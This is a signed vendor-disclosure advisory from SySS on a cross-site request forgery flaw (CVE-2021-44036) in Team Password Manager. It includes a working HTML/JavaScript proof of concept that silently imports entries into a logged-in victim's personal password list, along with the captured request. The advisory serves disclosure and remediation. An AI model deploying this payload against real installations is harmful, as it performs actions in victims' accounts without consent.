-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID:               SYSS-2021-059
Product:                   Team Password Manager
Manufacturer:              Ferran Barba
Affected Version(s):       9.125.225 (released 2021-04-30)
Tested Version(s):         9.125.225 (released 2021-04-30)
Vulnerability Type:        Cross-Site Request Forgery (CWE-352)
Risk Level:                Low
Solution Status:           Fixed
Manufacturer Notification: 2021-10-28
Solution Date:             2021-11-12
Public Disclosure:         2021-11-30
CVE Reference:             CVE-2021-44036
Author of Advisory:        Stefan Walter, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The manufacturer describes the product as follows (see [1]):

"Team Password Manager is a self hosted (also called on-premises) web app that
helps companies manage lots of passwords across lots of projects.
It's specially designed for teams that need to manage several passwords in each
project, that have lots of projects and that each project is shared among
several people."

Due to one single endpoint not enforcing its anti-CSRF token, the application
is vulnerable to CSRF.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The anti-CSRF token for the endpoint /index.php/mysettings/import_upload
is not checked. It can be left empty and the server will nonetheless
process the request. This allows cross-site requests to import passwords
into the area "My Passwords" of the affected user.

The impact on security is negligible since passwords can only be imported
into the personal area of users and not into shared projects.

Attributes of existing passwords under "My Passwords" could not be overridden.
Other endpoints which do not check the anti-CSRF token were not identified.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

The following HTML document can be deployed on the attacker's web server and
triggers the victim's browser to import the passwords.

    <html>
      <body>
          <h1>Proof of Concept: CSRF Password Import</h1>
          <p>
          If a user is logged in into the TeamPasswordManager, and if they visit this site in the same browser in another tab,
          then passwords are silently added to their "My Passwords" page.
          </p>
          <script>history.pushState('', '', '/')</script>
          <script>
              function submitRequest()
              {
                var xhr = new XMLHttpRequest();
                xhr.open("POST", "https:\/\/testinstallation\/index.php\/mysettings\/import_upload", true);
                xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=--boundary");
                xhr.withCredentials = true;
                var body = "----boundary\r\n" +
                  "Content-Disposition: form-data; name=\"csrft\"\r\n" +
                  "\r\n" +
                  "\r\n" +
                  "----boundary\r\n" +
                  "Content-Disposition: form-data; name=\"userfile\"; filename=\"mypasswords.csv\"\r\n" +
                  "Content-Type: text/csv\r\n" +
                  "\r\n" +
                  "\"Test Password 0\",\"\",\"\",\"user0@example.com\",\"password\",\"\",\"\"\n" +
                  "\"Test Password 1\",\"\",\"\",\"user1@example.com\",\"password\",\"\",\"\"\n" +
                  "\"Test Password 2\",\"\",\"\",\"user2@example.com\",\"password\",\"\",\"\"\n" +
                  "\"Test Password 3\",\"\",\"\",\"user3@example.com\",\"password\",\"\",\"\"\n" +
                  "\"Test Password 4\",\"\",\"\",\"user4@example.com\",\"password\",\"\",\"\"\n" +
                  "\"Test Password 5\",\"\",\"\",\"user5@example.com\",\"password\",\"\",\"\"\n" +
                  "\"Test Password 6\",\"\",\"\",\"user6@example.com\",\"password\",\"\",\"\"\n" +
                  "\"Test Password 7\",\"\",\"\",\"user7@example.com\",\"password\",\"\",\"\"\n" +
                  "\"Test Password 8\",\"\",\"\",\"user8@example.com\",\"password\",\"\",\"\"\n" +
                  "\"Test Password 9\",\"\",\"\",\"user9@example.com\",\"password\",\"\",\"\"\n" +
                  "\r\n" +
                  "----boundary--\r\n";
                var aBody = new Uint8Array(body.length);
                for (var i = 0; i < aBody.length; i++)
                  aBody[i] = body.charCodeAt(i);
                xhr.send(new Blob([aBody]));
              }
              submitRequest();
          </script>
      </body>
    </html>

The following request is sent to the web server during the attack:
(inessential headers were removed in the listing)

    POST /index.php/mysettings/import_upload HTTP/1.1
    Host: testinstallation
    [...]
    Cookie: PHPSESSID=ng3qmvt8ppqo7tg9f4jh04ipmm
    Content-Type: multipart/form-data; boundary=--boundary
    Content-Length: 809
    Origin: null

    ----boundary
    Content-Disposition: form-data; name="csrft"


    ----boundary
    Content-Disposition: form-data; name="userfile"; filename="mypasswords.csv"
    Content-Type: text/csv

    "Test Password 0","","","user0@example.com","password","",""
    "Test Password 1","","","user1@example.com","password","",""
    "Test Password 2","","","user2@example.com","password","",""
    "Test Password 3","","","user3@example.com","password","",""
    "Test Password 4","","","user4@example.com","password","",""
    "Test Password 5","","","user5@example.com","password","",""
    "Test Password 6","","","user6@example.com","password","",""
    "Test Password 7","","","user7@example.com","password","",""
    "Test Password 8","","","user8@example.com","password","",""
    "Test Password 9","","","user9@example.com","password","",""

    ----boundary--

The web server answers exactly as it does for legitimate requests and
the passwords are indeed imported (inessential headers were removed in
the listing).

    HTTP/1.1 302 Found
    [...]
    Location: https://testinstallation/index.php/mysettings/import_result
    [...]

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Update Team Password Manager to the patched version.

We thank the vendor for quickly responding to our e-mail and providing a solution.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2021-10-12: Vulnerability discovered
2021-10-28: Vulnerability reported to manufacturer
2021-11-12: Fixed in release 10.135.236 (see [2])
2020-11-30: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for Team Password Manager
    https://teampasswordmanager.com/faq/what-is-teampasswordmanager/
[2] Changelog of the fixed version
    https://teampasswordmanager.com/docs/changelog/#10.135.236
[3] SySS Security Advisory SYSS-2021-059
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-059.txt
[4] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Stefan Walter of SySS GmbH.

E-Mail: stefan.walter@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Stefan_Walter.asc
Key Fingerprint: 74DD 77CD 0317 2777 470D 38BE BE0B B311 DA3F 3E16

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEdN13zQMXJ3dHDTi+vguzEdo/PhYFAmGbbwgACgkQvguzEdo/
PhZ/3RAAnkLUEC8F9BXJYMit7beJHNvvbOIu6gMPMdDhH8vZbiaq5G09RAUOPEf+
qho47m+ZJQMN/Nhduk0tjd8R39sm3IJq86giWDkJFsxf2Raq8QuubuArt3WqlPzG
5fK+j20C/OgjVrymyZlyiTLxbWasnpONlfZcFcgudGDBrB+ieZs4kFQDipUJMJ+e
/3G1VY2IbREl5i4fD/nwkq1PXbEFNtNkMiHRrGEmYv6603phQLoAmj3H1VN/zMmP
Uc3f07rTI7VcR5PeW20JMp7BmdzJXh92c4MPwK3CpYjYxBaFT6/7ZGXMw1Qg33lf
tto/Y8CRlF1PKzTSHlTVudkxSfqLLgh947RJ1u+GZG1e8Ttuqci8fL4WnzEssit4
ijSJ+n8AAMhlub9/ZhGw/6etHtSorkTmp3VFs5r/azFUThdHx+GzvftHNJ/Rw/77
F8ulMjpTHe6WKih5YqyflE/wrvfqN6zSn6dFMa1CkZ83ntzI0lIWfjKzuHqYTVJW
2bXYgZORsd3yxnTqfh64ts1zPz4hZ6cVDVZjPqcRrOTEz8LurqdLtxR84z5Rp4KG
C17asbTJ4JyF6yH9L2BzoEi41kNE09pBzDnQerpPNcY/1zpeYRVXHKu/bTpWkVx1
Vl1YQIcyuv8hgfdpZCtMeWYok1p8ABCm5qFWavKBjoGu49s5gpA=
=I4Gt
-----END PGP SIGNATURE-----